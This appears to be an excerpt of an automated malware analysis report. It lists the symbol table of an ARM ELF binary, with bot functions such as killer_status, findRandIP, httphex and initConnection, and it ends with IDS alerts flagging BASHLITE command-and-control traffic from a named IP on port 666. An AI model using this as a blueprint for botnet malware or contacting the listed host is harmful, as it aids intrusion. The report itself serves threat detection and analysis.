                        __bss_start__.symtab0x293400NOTYPE<unknown>DEFAULTSHN_ABS
                        __check_one_fd.symtab0x15d1056FUNC<unknown>DEFAULT2
                        __close_nameservers.symtab0x1af70124FUNC<unknown>HIDDEN2
                        __cmpdf2.symtab0x1c470132FUNC<unknown>HIDDEN2
                        __ctype_b.symtab0x290e44OBJECT<unknown>DEFAULT9
                        __ctype_tolower.symtab0x293384OBJECT<unknown>DEFAULT9
                        __ctype_toupper.symtab0x290ec4OBJECT<unknown>DEFAULT9
                        __curbrk.symtab0x2f5944OBJECT<unknown>HIDDEN10
                        __data_start.symtab0x290180NOTYPE<unknown>DEFAULT9
                        __decode_dotted.symtab0x1a270244FUNC<unknown>HIDDEN2
                        __decode_header.symtab0x1b5a8180FUNC<unknown>HIDDEN2
                        __default_rt_sa_restorer.symtab0x161280FUNC<unknown>DEFAULT2
                        __default_sa_restorer.symtab0x161240FUNC<unknown>DEFAULT2
                        __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                        __div0.symtab0x118704FUNC<unknown>HIDDEN2
                        __divdf3.symtab0x1c25c516FUNC<unknown>HIDDEN2
                        __divsi3.symtab0x1b9f4296FUNC<unknown>HIDDEN2
                        __dns_lookup.symtab0x1a3641920FUNC<unknown>HIDDEN2
                        __do_global_ctors_aux.symtab0x1c5dc0FUNC<unknown>DEFAULT2
                        __do_global_dtors_aux.symtab0x80b00FUNC<unknown>DEFAULT2
                        __dso_handle.symtab0x2901c0OBJECT<unknown>HIDDEN9
                        __encode_dotted.symtab0x1b94c168FUNC<unknown>HIDDEN2
                        __encode_header.symtab0x1b4c0232FUNC<unknown>HIDDEN2
                        __encode_question.symtab0x1b65c92FUNC<unknown>HIDDEN2
                        __end__.symtab0x2faa80NOTYPE<unknown>DEFAULTSHN_ABS
                        __environ.symtab0x2f57c4OBJECT<unknown>DEFAULT10
                        __eqdf2.symtab0x1c470132FUNC<unknown>HIDDEN2
                        __errno_location.symtab0x11d0012FUNC<unknown>DEFAULT2
                        __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __error.symtab0x118e40NOTYPE<unknown>DEFAULT2
                        __exit_cleanup.symtab0x2f5744OBJECT<unknown>HIDDEN10
                        __extendsfdf2.symtab0x1be7464FUNC<unknown>HIDDEN2
                        __fcntl_nocancel.symtab0x11b68100FUNC<unknown>DEFAULT2
                        __fgetc_unlocked.symtab0x180cc304FUNC<unknown>DEFAULT2
                        __fini_array_end.symtab0x290040NOTYPE<unknown>HIDDENSHN_ABS
                        __fini_array_start.symtab0x290040NOTYPE<unknown>HIDDENSHN_ABS
                        __fixunsdfsi.symtab0x1c58884FUNC<unknown>HIDDEN2
                        __floatdidf.symtab0x1bec8108FUNC<unknown>HIDDEN2
                        __floatsidf.symtab0x1be4844FUNC<unknown>HIDDEN2
                        __floatundidf.symtab0x1beb4128FUNC<unknown>HIDDEN2
                        __floatunsidf.symtab0x1be2040FUNC<unknown>HIDDEN2
                        __gedf2.symtab0x1c460148FUNC<unknown>HIDDEN2
                        __get_hosts_byname_r.symtab0x1afec72FUNC<unknown>HIDDEN2
                        __getdents64.symtab0x19720352FUNC<unknown>HIDDEN2
                        __getpagesize.symtab0x1618424FUNC<unknown>DEFAULT2
                        __glibc_strerror_r.symtab0x1348820FUNC<unknown>DEFAULT2
                        __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __gtdf2.symtab0x1c460148FUNC<unknown>HIDDEN2
                        __h_errno_location.symtab0x166b412FUNC<unknown>DEFAULT2
                        __h_errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __init_array_end.symtab0x290040NOTYPE<unknown>HIDDENSHN_ABS
                        __init_array_start.symtab0x290040NOTYPE<unknown>HIDDENSHN_ABS
                        __ledf2.symtab0x1c468140FUNC<unknown>HIDDEN2
                        __libc_close.symtab0x11ca044FUNC<unknown>DEFAULT2
                        __libc_connect.symtab0x1370c44FUNC<unknown>DEFAULT2
                        __libc_fcntl.symtab0x11b04100FUNC<unknown>DEFAULT2
                        __libc_fork.symtab0x119f444FUNC<unknown>DEFAULT2
                        __libc_lseek64.symtab0x1b414100FUNC<unknown>DEFAULT2
                        __libc_nanosleep.symtab0x1629044FUNC<unknown>DEFAULT2
                        __libc_open.symtab0x1192492FUNC<unknown>DEFAULT2
                        __libc_read.symtab0x11a8444FUNC<unknown>DEFAULT2
                        __libc_recv.symtab0x1379444FUNC<unknown>DEFAULT2
                        __libc_recvfrom.symtab0x137c052FUNC<unknown>DEFAULT2
                        __libc_select.symtab0x11a5448FUNC<unknown>DEFAULT2
                        __libc_send.symtab0x137f444FUNC<unknown>DEFAULT2
                        __libc_sendto.symtab0x1382052FUNC<unknown>DEFAULT2
                        __libc_sigaction.symtab0x160b0116FUNC<unknown>DEFAULT2
                        __libc_stack_end.symtab0x2f5784OBJECT<unknown>DEFAULT10
                        __libc_waitpid.symtab0x11a208FUNC<unknown>DEFAULT2
                        __libc_write.symtab0x11bcc44FUNC<unknown>DEFAULT2
                        __local_nameserver.symtab0x2083816OBJECT<unknown>HIDDEN4
                        __ltdf2.symtab0x1c468140FUNC<unknown>HIDDEN2
                        __malloc_consolidate.symtab0x147d8424FUNC<unknown>HIDDEN2
                        __malloc_largebin_index.symtab0x13a04120FUNC<unknown>DEFAULT2
                        __malloc_lock.symtab0x2923024OBJECT<unknown>DEFAULT9
                        __malloc_state.symtab0x2f714888OBJECT<unknown>DEFAULT10
                        __malloc_trim.symtab0x14734164FUNC<unknown>DEFAULT2
                        __modsi3.symtab0x1178c228FUNC<unknown>HIDDEN2
                        __muldf3.symtab0x1bf34808FUNC<unknown>HIDDEN2
                        __muldi3.symtab0x1187472FUNC<unknown>HIDDEN2
                        __nameserver.symtab0x2fa9c4OBJECT<unknown>HIDDEN10
                        __nameservers.symtab0x2faa04OBJECT<unknown>HIDDEN10
                        __nedf2.symtab0x1c470132FUNC<unknown>HIDDEN2
                        __open_etc_hosts.symtab0x1b6b812FUNC<unknown>HIDDEN2
                        __open_nameservers.symtab0x1ab641036FUNC<unknown>HIDDEN2
                        __pagesize.symtab0x2f5804OBJECT<unknown>DEFAULT10
                        __preinit_array_end.symtab0x290040NOTYPE<unknown>HIDDENSHN_ABS
                        __preinit_array_start.symtab0x290040NOTYPE<unknown>HIDDENSHN_ABS
                        __progname.symtab0x293284OBJECT<unknown>DEFAULT9
                        __progname_full.symtab0x2932c4OBJECT<unknown>DEFAULT9
                        __pthread_initialize_minimal.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                        __pthread_mutex_init.symtab0x15c748FUNC<unknown>DEFAULT2
                        __pthread_mutex_lock.symtab0x15c6c8FUNC<unknown>DEFAULT2
                        __pthread_mutex_trylock.symtab0x15c6c8FUNC<unknown>DEFAULT2
                        __pthread_mutex_unlock.symtab0x15c6c8FUNC<unknown>DEFAULT2
                        __pthread_return_0.symtab0x15c6c8FUNC<unknown>DEFAULT2
                        __read_etc_hosts_r.symtab0x1b6c4480FUNC<unknown>HIDDEN2
                        __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                        __res_sync.symtab0x2fa944OBJECT<unknown>HIDDEN10
                        __resolv_attempts.symtab0x293331OBJECT<unknown>HIDDEN9
                        __resolv_lock.symtab0x2f59c24OBJECT<unknown>DEFAULT10
                        __resolv_timeout.symtab0x293321OBJECT<unknown>HIDDEN9
                        __rtld_fini.symtab0x2f5884OBJECT<unknown>HIDDEN10
                        __searchdomain.symtab0x2fa984OBJECT<unknown>HIDDEN10
                        __searchdomains.symtab0x2faa44OBJECT<unknown>HIDDEN10
                        __sigaddset.symtab0x139bc36FUNC<unknown>DEFAULT2
                        __sigdelset.symtab0x139e036FUNC<unknown>DEFAULT2
                        __sigismember.symtab0x1399836FUNC<unknown>DEFAULT2
                        __stdin.symtab0x290fc4OBJECT<unknown>DEFAULT9
                        __stdio_READ.symtab0x199c492FUNC<unknown>HIDDEN2
                        __stdio_WRITE.symtab0x16ce0184FUNC<unknown>HIDDEN2
                        __stdio_adjust_position.symtab0x19a20192FUNC<unknown>HIDDEN2
                        __stdio_fwrite.symtab0x17084312FUNC<unknown>HIDDEN2
                        __stdio_init_mutex.symtab0x11ea016FUNC<unknown>HIDDEN2
                        __stdio_mutex_initializer.4582.symtab0x1fab824OBJECT<unknown>DEFAULT4
                        __stdio_rfill.symtab0x19ae044FUNC<unknown>HIDDEN2
                        __stdio_seek.symtab0x19bc848FUNC<unknown>HIDDEN2
                        __stdio_trans2r_o.symtab0x19b0c188FUNC<unknown>HIDDEN2
                        __stdio_trans2w_o.symtab0x171bc260FUNC<unknown>HIDDEN2
                        __stdio_wcommit.symtab0x11f6844FUNC<unknown>HIDDEN2
                        __stdout.symtab0x291004OBJECT<unknown>DEFAULT9
                        __subdf3.symtab0x1bb3c740FUNC<unknown>HIDDEN2
                        __syscall_error.symtab0x1609428FUNC<unknown>HIDDEN2
                        __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __syscall_rt_sigaction.symtab0x162f444FUNC<unknown>DEFAULT2
                        __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __uClibc_fini.symtab0x15ca4108FUNC<unknown>DEFAULT2
                        __uClibc_init.symtab0x15d4876FUNC<unknown>DEFAULT2
                        __uClibc_main.symtab0x15d94672FUNC<unknown>DEFAULT2
                        __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __uclibc_progname.symtab0x293244OBJECT<unknown>HIDDEN9
                        __udivsi3.symtab0x115b0248FUNC<unknown>HIDDEN2
                        __umodsi3.symtab0x116c0204FUNC<unknown>HIDDEN2
                        __vfork.symtab0x118c040FUNC<unknown>HIDDEN2
                        __xpg_strerror_r.symtab0x134a8232FUNC<unknown>DEFAULT2
                        __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        __xstat32_conv.symtab0x1937c728FUNC<unknown>HIDDEN2
                        __xstat64_conv.symtab0x1906c784FUNC<unknown>HIDDEN2
                        __xstat_conv.symtab0x19654204FUNC<unknown>HIDDEN2
                        _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _bss_custom_printf_spec.symtab0x2f39410OBJECT<unknown>DEFAULT10
                        _bss_end__.symtab0x2faa80NOTYPE<unknown>DEFAULTSHN_ABS
                        _charpad.symtab0x11f9480FUNC<unknown>DEFAULT2
                        _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _custom_printf_arginfo.symtab0x2f6bc40OBJECT<unknown>HIDDEN10
                        _custom_printf_handler.symtab0x2f6e440OBJECT<unknown>HIDDEN10
                        _custom_printf_spec.symtab0x2922c4OBJECT<unknown>HIDDEN9
                        _dl_aux_init.symtab0x18fc036FUNC<unknown>DEFAULT2
                        _dl_phdr.symtab0x2fa8c4OBJECT<unknown>DEFAULT10
                        _dl_phnum.symtab0x2fa904OBJECT<unknown>DEFAULT10
                        _edata.symtab0x293400NOTYPE<unknown>DEFAULTSHN_ABS
                        _end.symtab0x2faa80NOTYPE<unknown>DEFAULTSHN_ABS
                        _errno.symtab0x2f58c4OBJECT<unknown>DEFAULT10
                        _exit.symtab0x11c4840FUNC<unknown>DEFAULT2
                        _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _fini.symtab0x1c6180FUNC<unknown>DEFAULT3
                        _fixed_buffers.symtab0x2d3948192OBJECT<unknown>DEFAULT10
                        _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _fp_out_narrow.symtab0x11fe4128FUNC<unknown>DEFAULT2
                        _fpmaxtostr.symtab0x174c41952FUNC<unknown>HIDDEN2
                        _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _h_errno.symtab0x2f5904OBJECT<unknown>DEFAULT10
                        _init.symtab0x80940FUNC<unknown>DEFAULT1
                        _load_inttype.symtab0x172c0112FUNC<unknown>HIDDEN2
                        _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _memcpy.symtab0x182900FUNC<unknown>HIDDEN2
                        _ppfs_init.symtab0x126c4152FUNC<unknown>HIDDEN2
                        _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _ppfs_parsespec.symtab0x1297c1344FUNC<unknown>HIDDEN2
                        _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _ppfs_prepargs.symtab0x1275c56FUNC<unknown>HIDDEN2
                        _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _ppfs_setargs.symtab0x12794412FUNC<unknown>HIDDEN2
                        _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _promoted_size.symtab0x1293076FUNC<unknown>DEFAULT2
                        _pthread_cleanup_pop_restore.symtab0x15c8432FUNC<unknown>DEFAULT2
                        _pthread_cleanup_push_defer.symtab0x15c7c8FUNC<unknown>DEFAULT2
                        _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _sigintr.symtab0x2f70c8OBJECT<unknown>HIDDEN10
                        _start.symtab0x81900FUNC<unknown>DEFAULT2
                        _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _stdio_fopen.symtab0x16d98748FUNC<unknown>HIDDEN2
                        _stdio_init.symtab0x11e24124FUNC<unknown>HIDDEN2
                        _stdio_openlist.symtab0x291044OBJECT<unknown>DEFAULT9
                        _stdio_openlist_add_lock.symtab0x2910824OBJECT<unknown>DEFAULT9
                        _stdio_openlist_dec_use.symtab0x17dbc320FUNC<unknown>HIDDEN2
                        _stdio_openlist_del_count.symtab0x2d3904OBJECT<unknown>DEFAULT10
                        _stdio_openlist_del_lock.symtab0x2912024OBJECT<unknown>DEFAULT9
                        _stdio_openlist_use_count.symtab0x2d38c4OBJECT<unknown>DEFAULT10
                        _stdio_streams.symtab0x2913c240OBJECT<unknown>DEFAULT9
                        _stdio_term.symtab0x11eb0184FUNC<unknown>HIDDEN2
                        _stdio_user_locking.symtab0x291384OBJECT<unknown>DEFAULT9
                        _stdlib_strto_l.symtab0x151e0408FUNC<unknown>HIDDEN2
                        _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _store_inttype.symtab0x1733064FUNC<unknown>HIDDEN2
                        _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _string_syserrmsgs.symtab0x1fb882906OBJECT<unknown>HIDDEN4
                        _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _uintmaxtostr.symtab0x17370340FUNC<unknown>HIDDEN2
                        _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _vfprintf_internal.symtab0x120641632FUNC<unknown>HIDDEN2
                        _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        abort.symtab0x14bb0256FUNC<unknown>DEFAULT2
                        abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        access.symtab0x11a2844FUNC<unknown>DEFAULT2
                        access.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        acnc.symtab0xc588220FUNC<unknown>DEFAULT2
                        add_entry.symtab0x105b0144FUNC<unknown>DEFAULT2
                        atoi.symtab0x151cc12FUNC<unknown>DEFAULT2
                        atol.symtab0x151cc12FUNC<unknown>DEFAULT2
                        atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        bcopy.symtab0x130a016FUNC<unknown>DEFAULT2
                        been_there_done_that.symtab0x2f5704OBJECT<unknown>DEFAULT10
                        brk.symtab0x18fe456FUNC<unknown>DEFAULT2
                        brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        bsd_signal.symtab0x138f4164FUNC<unknown>DEFAULT2
                        buf.5390.symtab0x2f3a4440OBJECT<unknown>DEFAULT10
                        bzero.symtab0x130e012FUNC<unknown>DEFAULT2
                        c.symtab0x290d44OBJECT<unknown>DEFAULT9
                        call___do_global_ctors_aux.symtab0x1c6100FUNC<unknown>DEFAULT2
                        call___do_global_dtors_aux.symtab0x81280FUNC<unknown>DEFAULT2
                        call_frame_dummy.symtab0x81880FUNC<unknown>DEFAULT2
                        calloc.symtab0x142c0268FUNC<unknown>DEFAULT2
                        calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        checksum_generic.symtab0x81cc228FUNC<unknown>DEFAULT2
                        checksum_tcp_udp.symtab0x82b0448FUNC<unknown>DEFAULT2
                        checksum_tcpudp.symtab0x8470448FUNC<unknown>DEFAULT2
                        clock.symtab0x11d0c48FUNC<unknown>DEFAULT2
                        clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        clock_getres.symtab0x161a444FUNC<unknown>DEFAULT2
                        clock_getres.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        close.symtab0x11ca044FUNC<unknown>DEFAULT2
                        close.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        closedir.symtab0x16320212FUNC<unknown>DEFAULT2
                        closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        closenameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        completed.4910.symtab0x293401OBJECT<unknown>DEFAULT10
                        connect.symtab0x1370c44FUNC<unknown>DEFAULT2
                        connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        connectTimeout.symtab0xa02c640FUNC<unknown>DEFAULT2
                        crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        csum.symtab0xa4b0344FUNC<unknown>DEFAULT2
                        data_start.symtab0x290240NOTYPE<unknown>DEFAULT9
                        decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        dup2.symtab0x118f044FUNC<unknown>DEFAULT2
                        dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        environ.symtab0x2f57c4OBJECT<unknown>DEFAULT10
                        errno.symtab0x2f58c4OBJECT<unknown>DEFAULT10
                        errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        execl.symtab0x15b8c148FUNC<unknown>DEFAULT2
                        execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        execve.symtab0x1615844FUNC<unknown>DEFAULT2
                        execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        exit.symtab0x15378148FUNC<unknown>DEFAULT2
                        exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        exp10_table.symtab0x2078c72OBJECT<unknown>DEFAULT4
                        fclose.symtab0x16b64368FUNC<unknown>DEFAULT2
                        fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fcntl.symtab0x11b04100FUNC<unknown>DEFAULT2
                        fd_to_DIR.symtab0x163f4188FUNC<unknown>DEFAULT2
                        fdgets.symtab0x991c208FUNC<unknown>DEFAULT2
                        fdopen_pids.symtab0x2d3784OBJECT<unknown>DEFAULT10
                        fdopendir.symtab0x1654c148FUNC<unknown>DEFAULT2
                        fdpclose.symtab0x9798388FUNC<unknown>DEFAULT2
                        fdpopen.symtab0x9514644FUNC<unknown>DEFAULT2
                        fflush_unlocked.symtab0x17efc464FUNC<unknown>DEFAULT2
                        fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fgetc.symtab0x17c64188FUNC<unknown>DEFAULT2
                        fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fgetc_unlocked.symtab0x180cc304FUNC<unknown>DEFAULT2
                        fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fgets.symtab0x17d20156FUNC<unknown>DEFAULT2
                        fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fgets_unlocked.symtab0x181fc148FUNC<unknown>DEFAULT2
                        fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        findRandIP.symtab0xa45096FUNC<unknown>DEFAULT2
                        fmt.symtab0x2077820OBJECT<unknown>DEFAULT4
                        fopen.symtab0x16cd412FUNC<unknown>DEFAULT2
                        fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        force_to_data.symtab0x290180OBJECT<unknown>DEFAULT9
                        force_to_data.symtab0x2933c0OBJECT<unknown>DEFAULT9
                        fork.symtab0x119f444FUNC<unknown>DEFAULT2
                        fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fputs_unlocked.symtab0x12ebc52FUNC<unknown>DEFAULT2
                        fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        frame_dummy.symtab0x81300FUNC<unknown>DEFAULT2
                        free.symtab0x14980520FUNC<unknown>DEFAULT2
                        free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fseek.symtab0x1988012FUNC<unknown>DEFAULT2
                        fseeko.symtab0x1988012FUNC<unknown>DEFAULT2
                        fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fseeko64.symtab0x1988c312FUNC<unknown>DEFAULT2
                        fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fstat.symtab0x1901c80FUNC<unknown>DEFAULT2
                        fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        fwrite_unlocked.symtab0x12ef0172FUNC<unknown>DEFAULT2
                        fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getBuild.symtab0xeb5c16FUNC<unknown>DEFAULT2
                        getHost.symtab0x9c14100FUNC<unknown>DEFAULT2
                        getOurIP.symtab0xe894712FUNC<unknown>DEFAULT2
                        get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getc.symtab0x17c64188FUNC<unknown>DEFAULT2
                        getc_unlocked.symtab0x180cc304FUNC<unknown>DEFAULT2
                        getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getdtablesize.symtab0x11ab040FUNC<unknown>DEFAULT2
                        getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getegid.symtab0x161fc8FUNC<unknown>DEFAULT2
                        getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        geteuid.symtab0x119ec8FUNC<unknown>DEFAULT2
                        geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getgid.symtab0x1625c8FUNC<unknown>DEFAULT2
                        getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        gethostbyname.symtab0x136b48FUNC<unknown>DEFAULT2
                        gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        gethostbyname2.symtab0x136bc80FUNC<unknown>DEFAULT2
                        gethostbyname2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        gethostbyname2_r.symtab0x18d10664FUNC<unknown>DEFAULT2
                        gethostbyname2_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        gethostbyname_r.symtab0x1b034756FUNC<unknown>DEFAULT2
                        gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        gethostname.symtab0x1b354112FUNC<unknown>DEFAULT2
                        gethostname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getpagesize.symtab0x1618424FUNC<unknown>DEFAULT2
                        getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getpid.symtab0x119ac8FUNC<unknown>DEFAULT2
                        getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getppid.symtab0x1191c8FUNC<unknown>DEFAULT2
                        getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getrlimit.symtab0x161d044FUNC<unknown>DEFAULT2
                        getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getsockname.symtab0x1373844FUNC<unknown>DEFAULT2
                        getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getsockopt.symtab0x1376448FUNC<unknown>DEFAULT2
                        getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        getuid.symtab0x1619c8FUNC<unknown>DEFAULT2
                        getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        h_errno.symtab0x2f5904OBJECT<unknown>DEFAULT10
                        hacks.symtab0x290284OBJECT<unknown>DEFAULT9
                        hacks2.symtab0x2902c4OBJECT<unknown>DEFAULT9
                        hacks3.symtab0x290304OBJECT<unknown>DEFAULT9
                        hacks4.symtab0x290344OBJECT<unknown>DEFAULT9
                        hextable.symtab0x1d3201024OBJECT<unknown>DEFAULT4
                        hoste.5389.symtab0x2f55c20OBJECT<unknown>DEFAULT10
                        htonl.symtab0x1363c32FUNC<unknown>DEFAULT2
                        htons.symtab0x1362820FUNC<unknown>DEFAULT2
                        httphex.symtab0xc7b0960FUNC<unknown>DEFAULT2
                        i.4833.symtab0x290d84OBJECT<unknown>DEFAULT9
                        index.symtab0x1339c236FUNC<unknown>DEFAULT2
                        inet_addr.symtab0x1369036FUNC<unknown>DEFAULT2
                        inet_aton.symtab0x18c20240FUNC<unknown>DEFAULT2
                        inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        inet_ntop.symtab0x1a004620FUNC<unknown>DEFAULT2
                        inet_ntop4.symtab0x19ec4320FUNC<unknown>DEFAULT2
                        inet_pton.symtab0x19cc4512FUNC<unknown>DEFAULT2
                        inet_pton4.symtab0x19bf8204FUNC<unknown>DEFAULT2
                        initConnection.symtab0xe670548FUNC<unknown>DEFAULT2
                        init_rand.symtab0x8778212FUNC<unknown>DEFAULT2
                        initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        initstate.symtab0x14dbc152FUNC<unknown>DEFAULT2
                        initstate_r.symtab0x15104200FUNC<unknown>DEFAULT2
                        ioctl.symtab0x11bf880FUNC<unknown>DEFAULT2
                        ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        isatty.symtab0x1359032FUNC<unknown>DEFAULT2
                        isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        kill.symtab0x11ad844FUNC<unknown>DEFAULT2
                        kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        killer_status.symtab0x2936c4OBJECT<unknown>DEFAULT10
                        last_id.5447.symtab0x293302OBJECT<unknown>DEFAULT9
                        last_ns_num.5446.symtab0x2f5984OBJECT<unknown>DEFAULT10
                        libc/string/arm/_memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/string/arm/bcopy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/string/arm/bzero.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/string/arm/memcpy.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/string/arm/memmove.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/string/arm/memset.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/string/arm/strcmp.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/string/arm/strlen.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/sysdeps/linux/arm/crt1.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/sysdeps/linux/arm/crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/sysdeps/linux/arm/crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/sysdeps/linux/arm/sigrestorer.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libc/sysdeps/linux/arm/vfork.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        libgcc2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        listFork.symtab0xa2ac420FUNC<unknown>DEFAULT2
                        llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                        lseek64.symtab0x1b414100FUNC<unknown>DEFAULT2
                        macAddress.symtab0x293706OBJECT<unknown>DEFAULT10
                        main.symtab0xeb6c2460FUNC<unknown>DEFAULT2
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2025-05-10T07:48:50.662762+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440808TCP
                        2025-05-10T07:49:06.217459+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440810TCP
                        2025-05-10T07:49:22.058608+02002839489ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response192.60.77.69666192.168.2.1440812TCP
